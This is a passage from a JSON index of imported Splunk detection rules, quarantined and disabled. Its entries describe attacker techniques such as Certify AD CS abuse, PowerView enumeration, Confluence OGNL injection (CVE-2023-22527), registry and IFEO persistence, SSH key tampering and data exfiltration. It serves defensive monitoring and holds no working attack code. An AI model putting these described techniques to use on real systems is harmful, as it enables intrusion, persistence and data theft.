"detections/splunk-imports/_quarantine/cisco-configuration-archive-logging-analysis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f52d5c0b-d45d-4304-b300-a4f6a1130dec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_configuration_archive_logging_analysis.yml" } }, { "id": "splunk-security-content-f533ca6c-9440-4686-80cb-7f294c07812a", "type": "detection", "name": "Detect Certify With PowerShell Script Block Logging", "description": "The following analytic detects the use of the Certify tool via an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. It leverages PowerShell Script Block Logging (EventCode 4104) to identify specific command patterns associated with Certify's enumeration and exploitation functions. This activity is significant as it indicates potential reconnaissance or exploitation attempts against AD CS, which could lead to unauthorized certificate issuance. If confirmed malicious, attackers could leverage this to escalate privileges, persist in the environment, or access sensitive information by abusing AD CS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-certify-with-powershell-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f533ca6c-9440-4686-80cb-7f294c07812a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_certify_with_powershell_script_block_logging.yml" } }, { "id": "splunk-security-content-f56936c0-ae6f-4eeb-91ff-ecc1448c6105", "type": "detection", "name": "Confluence Pre-Auth RCE via OGNL Injection CVE-2023-22527", "description": "The following analytic identifies attempts to exploit a critical template injection vulnerability (CVE-2023-22527) in outdated Confluence Data Center and Server versions. It detects POST requests to the \"/template/aui/text-inline.vm\" endpoint with HTTP status codes 200 or 202, indicating potential OGNL injection attacks. This activity is significant as it allows unauthenticated attackers to execute arbitrary code remotely. If confirmed malicious, attackers could gain full control over the affected Confluence instance, leading to data breaches, system compromise, and further network infiltration. Immediate patching is essential to mitigate this threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/confluence-pre-auth-rce-via-ognl-injection-cve-2023-22527.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f56936c0-ae6f-4eeb-91ff-ecc1448c6105", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/confluence_pre_auth_rce_via_ognl_injection_cve_2023_22527.yml" } }, { "id": "splunk-security-content-f5939373-8054-40ad-8c64-cec478a22a4a", "type": "detection", "name": "Remote Desktop Process Running On System", "description": "The following analytic detects the execution of the remote desktop process (mstsc.exe) on systems where it is not typically run. This detection leverages data from Endpoint Detection and Response (EDR) agents, filtering out systems categorized as common RDP sources. This activity is significant because unauthorized use of mstsc.exe can indicate lateral movement or unauthorized remote access attempts. If confirmed malicious, this could allow an attacker to gain remote control of a system, potentially leading to data exfiltration, privilege escalation, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-desktop-process-running-on-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5939373-8054-40ad-8c64-cec478a22a4a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_desktop_process_running_on_system.yml" } }, { "id": "splunk-security-content-f5ab595e-28e5-4327-8077-5008ba97c850", "type": "detection", "name": "Linux SSH Authorized Keys Modification", "description": "The following analytic detects the modification of SSH Authorized Keys on Linux systems. It leverages process execution data from Endpoint Detection and Response (EDR) agents, specifically monitoring commands like \"bash\" and \"cat\" interacting with \"authorized_keys\" files. This activity is significant as adversaries often modify SSH Authorized Keys to establish persistent access to compromised endpoints. If confirmed malicious, this behavior could allow attackers to maintain unauthorized access, bypassing traditional authentication mechanisms and potentially leading to further exploitation or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ssh-authorized-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5ab595e-28e5-4327-8077-5008ba97c850", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ssh_authorized_keys_modification.yml" } }, { "id": "splunk-security-content-f5bde743-245a-4e1f-a152-3971cec6e9ef", "type": "detection", "name": "Windows Anomalous Registry Value Length in Environment Key", "description": "The following analytic detects creation or modification of registry values under a user or system Environment key (paths matching *\\Environment\\*) where the stored value exceeds 2,000 characters.\nLegitimate environment variables are typically short strings (paths, tokens, or flags); unusually long values can indicate adversaries or malware staging encoded payloads, bloated malicious PATH entries, or other data in a location that is loaded for every interactive session.\nThis behavior has been observed in contexts such as .NET infostealer activity. Analysts should validate the writing process, value content, and whether the change aligns with trusted software deployment or administrative tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-anomalous-registry-value-length-in-environment-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5bde743-245a-4e1f-a152-3971cec6e9ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_anomalous_registry_value_length_in_environment_key.yml" } }, { "id": "splunk-security-content-f5c1f64b-db59-4913-991e-3dac8adff288", "type": "detection", "name": "Windows Default Rdp File Unhidden", "description": "This detection identifies the use of attrib.exe to remove hidden (-h) or system (-s) attributes from the Default.rdp file, which is automatically created in a user's Documents folder when a Remote Desktop Protocol (RDP) session is initiated using mstsc.exe. The Default.rdp file stores session configuration details such as the remote host address and screen settings. Unhiding this file is uncommon in normal user behavior and may indicate that an attacker or red team operator is attempting to access or manipulate RDP connection history that was previously hidden\u2014either by default or as part of an earlier anti-forensics effort. This activity may represent part of a broader pattern of reconnaissance or staging for credential reuse, lateral movement, or forensic analysis evasion. Monitoring for this behavior can help uncover suspicious manipulation of user artifacts and highlight interactive attacker activity on a compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-rdp-file-unhidden.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5c1f64b-db59-4913-991e-3dac8adff288", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_rdp_file_unhidden.yml" } }, { "id": "splunk-security-content-f5f6af30-7aa7-4295-bfe9-07fe87c01a4b", "type": "detection", "name": "Registry Keys Used For Persistence", "description": "The following analytic identifies modifications to registry keys commonly used for persistence mechanisms. It leverages data from endpoint detection sources like Sysmon or Carbon Black, focusing on specific registry paths known to initiate applications or services during system startup. This activity is significant as unauthorized changes to these keys can indicate attempts to maintain persistence or execute malicious actions upon system boot. If confirmed malicious, this could allow attackers to achieve persistent access, execute arbitrary code, or maintain control over compromised systems, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/registry-keys-used-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5f6af30-7aa7-4295-bfe9-07fe87c01a4b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/registry_keys_used_for_persistence.yml" } }, { "id": "splunk-security-content-f5f6af30-7aa7-4295-bfe9-07fe87c01bbb", "type": "detection", "name": "Registry Keys for Creating SHIM Databases", "description": "The following analytic detects registry activity related to the creation of application compatibility shims. It leverages data from the Endpoint.Registry data model, specifically monitoring registry paths associated with AppCompatFlags. This activity is significant because attackers can use shims to bypass security controls, achieve persistence, or escalate privileges. If confirmed malicious, this could allow an attacker to maintain long-term access, execute arbitrary code, or manipulate application behavior, posing a severe risk to the integrity and security of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/registry-keys-for-creating-shim-databases.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5f6af30-7aa7-4295-bfe9-07fe87c01bbb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/registry_keys_for_creating_shim_databases.yml" } }, { "id": "splunk-security-content-f5f6af30-7ba7-4295-bfe9-07de87c01bbc", "type": "detection", "name": "Monitor Registry Keys for Print Monitors", "description": "The following analytic detects modifications to the registry key `HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors`. It leverages data from the Endpoint.Registry data model, focusing on events where the registry path is modified. This activity is significant because attackers can exploit this registry key to load arbitrary .dll files, which will execute with elevated SYSTEM permissions and persist after a reboot. If confirmed malicious, this could allow attackers to maintain persistence, execute code with high privileges, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/monitor-registry-keys-for-print-monitors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5f6af30-7ba7-4295-bfe9-07de87c01bbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/monitor_registry_keys_for_print_monitors.yml" } }, { "id": "splunk-security-content-f616c4f3-bde9-41cf-856c-019b65f668bb", "type": "detection", "name": "Linux Auditd Database File And Directory Discovery", "description": "The following analytic detects suspicious database file and directory discovery activities, which may signal an attacker attempt to locate and assess critical database assets on a compromised system. This behavior is often a precursor to data theft, unauthorized access, or privilege escalation, as attackers seek to identify valuable information stored in databases. By monitoring for unusual or unauthorized attempts to locate database files and directories, this analytic aids in early detection of potential reconnaissance or data breach efforts, enabling security teams to respond swiftly and mitigate the risk of further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-database-file-and-directory-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f616c4f3-bde9-41cf-856c-019b65f668bb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_database_file_and_directory_discovery.yml" } }, { "id": "splunk-security-content-f6343e86-6e09-11ec-9376-acde48001122", "type": "detection", "name": "Linux Doas Conf File Creation", "description": "The following analytic detects the creation of the doas.conf file on a Linux host. This file is used by the doas utility to allow standard users to perform tasks as root, similar to sudo. The detection leverages filesystem data from the Endpoint data model, focusing on the creation of the doas.conf file. This activity is significant because it can indicate an attempt to gain elevated privileges, potentially by an adversary. If confirmed malicious, this could allow an attacker to execute commands with root privileges, leading to full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-doas-conf-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6343e86-6e09-11ec-9376-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_doas_conf_file_creation.yml" } }, { "id": "splunk-security-content-f63c34fe-a435-11eb-935a-acde48001122", "type": "detection", "name": "Executable File Written in Administrative SMB Share", "description": "The following analytic detects executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). It leverages Windows Security Event Logs with EventCode 5145 to identify this activity. This behavior is significant as it is commonly used by tools like PsExec/PaExec for staging binaries before creating and starting services on remote endpoints, a technique often employed for lateral movement and remote code execution. If confirmed malicious, this activity could allow an attacker to execute arbitrary code remotely, potentially compromising additional systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/executable-file-written-in-administrative-smb-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f63c34fe-a435-11eb-935a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/executable_file_written_in_administrative_smb_share.yml" } }, { "id": "splunk-security-content-f64579c0-203f-11ec-abcc-acde48001122", "type": "detection", "name": "Active Setup Registry Autostart", "description": "The following analytic detects suspicious modifications to the Active Setup registry for persistence and privilege escalation. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"StubPath\" value within the \"SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\" path. This activity is significant as it is commonly used by malware, adware, and APTs to maintain persistence on compromised machines. If confirmed malicious, this could allow attackers to execute code upon system startup, potentially leading to further system compromise and unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/active-setup-registry-autostart.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f64579c0-203f-11ec-abcc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/active_setup_registry_autostart.yml" } }, { "id": "splunk-security-content-f64da023-b988-4775-8d57-38e512beb56e", "type": "detection", "name": "GetDomainComputer with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainComputer` commandlet using PowerShell Script Block Logging (EventCode=4104). This commandlet is part of PowerView, a tool often used for enumerating domain computers within Windows environments. The detection leverages script block text analysis to identify this specific command. Monitoring this activity is crucial as it can indicate an adversary's attempt to gather information about domain computers, which is a common step in Active Directory reconnaissance. If confirmed malicious, this activity could lead to further network enumeration and potential lateral movement within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincomputer-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f64da023-b988-4775-8d57-38e512beb56e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincomputer_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-f65aa026-b811-42ab-b4b9-d9088137648f", "type": "detection", "name": "Windows Unusual Count Of Disabled Users Failed Auth Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate with multiple disabled domain users using the Kerberos protocol. It leverages EventCode 4768, which is generated when the Key Distribution Center issues a Kerberos Ticket Granting Ticket (TGT) and detects failure code `0x12` (credentials revoked). This behavior is significant as it may indicate a Password Spraying attack targeting disabled accounts, potentially leading to initial access or privilege escalation. If confirmed malicious, attackers could gain unauthorized access or elevate privileges within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-disabled-users-failed-auth-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f65aa026-b811-42ab-b4b9-d9088137648f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_disabled_users_failed_auth_using_kerberos.yml" } }, { "id": "splunk-security-content-f6601940-4c74-11ec-b9b7-3e22fbd008af", "type": "detection", "name": "Mmc LOLBAS Execution Process Spawn", "description": "The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where `mmc.exe` is the parent process. This activity is significant because adversaries can abuse the DCOM protocol and MMC20 COM object to execute malicious code, using Windows native binaries documented by the LOLBAS project. If confirmed malicious, this behavior could indicate lateral movement, allowing attackers to execute code remotely, potentially leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1218.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mmc-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6601940-4c74-11ec-b9b7-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/mmc_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-f6ea3466-d6bb-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect New Open GCP Storage Buckets", "description": "The following analytic identifies the creation of new open/public GCP Storage buckets. It leverages GCP PubSub events, specifically monitoring for the `storage.setIamPermissions` method and checks if the `allUsers` member is added. This activity is significant because open storage buckets can expose sensitive data to the public, posing a severe security risk. If confirmed malicious, an attacker could access, modify, or delete data within the bucket, leading to data breaches and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-open-gcp-storage-buckets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6ea3466-d6bb-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_new_open_gcp_storage_buckets.yml" } }, { "id": "splunk-security-content-f6ee02d6-fea0-11eb-b2c2-acde48001122", "type": "detection", "name": "Gsuite Drive Share In External Email", "description": "The following analytic detects Google Drive or Google Docs files shared externally from an internal domain. It leverages GSuite Drive logs, extracting and comparing the source and destination email domains to identify external sharing. This activity is significant as it may indicate potential data exfiltration by an attacker or insider. If confirmed malicious, this could lead to unauthorized access to sensitive information, data leakage, and potential compliance violations. Monitoring this behavior helps in early detection and mitigation of data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-drive-share-in-external-email.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6ee02d6-fea0-11eb-b2c2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_drive_share_in_external_email.yml" } }, { "id": "splunk-security-content-f6f904c4-1ac0-11ec-806b-acde48001122", "type": "detection", "name": "Suspicious Image Creation In Appdata Folder", "description": "The following analytic detects the creation of image files in the AppData folder by processes that also have a file reference in the same folder. It leverages data from the Endpoint.Processes and Endpoint.Filesystem datamodels to identify this behavior. This activity is significant because it is commonly associated with malware, such as the Remcos RAT, which captures screenshots and stores them in the AppData folder before exfiltrating them to a command-and-control server. If confirmed malicious, this activity could indicate unauthorized data capture and exfiltration, compromising sensitive information and user privacy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-image-creation-in-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6f904c4-1ac0-11ec-806b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_image_creation_in_appdata_folder.yml" } }, { "id": "splunk-security-content-f6fbe929-4187-4ba4-901e-8a34be838443", "type": "detection", "name": "Windows Process Execution in Temp Dir", "description": "The following analytic identifies processes running from %temp% directory file paths. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process paths within the Endpoint data model. This activity is significant because adversaries often use unconventional file paths to execute malicious code without requiring administrative privileges. If confirmed malicious, this behavior could indicate an attempt to bypass security controls, leading to unauthorized software execution, potential system compromise, and further malicious activities within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-execution-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6fbe929-4187-4ba4-901e-8a34be838443", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_execution_in_temp_dir.yml" } }, { "id": "splunk-security-content-f709e736-3e6c-492f-b865-bc7696cc24a7", "type": "detection", "name": "GitHub Enterprise Repository Deleted", "description": "The following analytic detects when a user deletes a repository in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for repository deletion events, which could indicate unauthorized removal of critical source code and project resources. For a SOC, identifying repository deletions is crucial as it may signal account compromise, insider threats, or malicious attempts to destroy intellectual property and disrupt development operations. The impact could be severe, potentially resulting in permanent loss of source code, documentation, project history, and other critical assets if proper backups are not maintained. Repository deletion could halt development workflows, cause significant business disruption, and require substantial effort to restore from backups if available. Additionally, unauthorized repository removal could be part of a larger attack campaign aimed at destroying or compromising enterprise assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-repository-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f709e736-3e6c-492f-b865-bc7696cc24a7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_repository_deleted.yml" } }, { "id": "splunk-security-content-f75b7f1a-b8eb-4975-a214-ff3e0a944757", "type": "detection", "name": "AWS High Number Of Failed Authentications From Ip", "description": "The following analytic detects an IP address with 20 or more failed authentication attempts to the AWS Web Console within a 5-minute window. This detection leverages CloudTrail logs, aggregating failed login events by IP address and time span. This activity is significant as it may indicate a brute force attack aimed at gaining unauthorized access or escalating privileges within an AWS environment. If confirmed malicious, this could lead to unauthorized access, data breaches, or further exploitation of AWS resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-high-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f75b7f1a-b8eb-4975-a214-ff3e0a944757", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_high_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-f79c5d7a-dd99-4263-93e1-49ace5634c82", "type": "detection", "name": "Windows Credential Target Information Structure in Commandline", "description": "Detects DNS-based Kerberos coercion attacks where adversaries inject marshaled credential structures into DNS records to spoof SPNs and redirect authentication such as in CVE-2025-33073. This detection leverages process creation events looking for specific CREDENTIAL_TARGET_INFORMATION structures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187", "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credential-target-information-structure-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f79c5d7a-dd99-4263-93e1-49ace5634c82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credential_target_information_structure_in_commandline.yml" } }, { "id": "splunk-security-content-f7abfab9-12ea-44e8-8745-475f9ca6e0a4", "type": "detection", "name": "Windows Event Triggered Image File Execution Options Injection", "description": "The following analytic identifies the creation or modification of Image File Execution Options (IFEO) registry keys, detected via EventCode 3000 in the Application channel. This detection leverages Windows Event Logs to monitor for process names added to IFEO under specific registry paths. This activity is significant as it can indicate attempts to set traps for process monitoring or debugging, often used by attackers for persistence or evasion. If confirmed malicious, this could allow an attacker to execute arbitrary code or manipulate process behavior, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 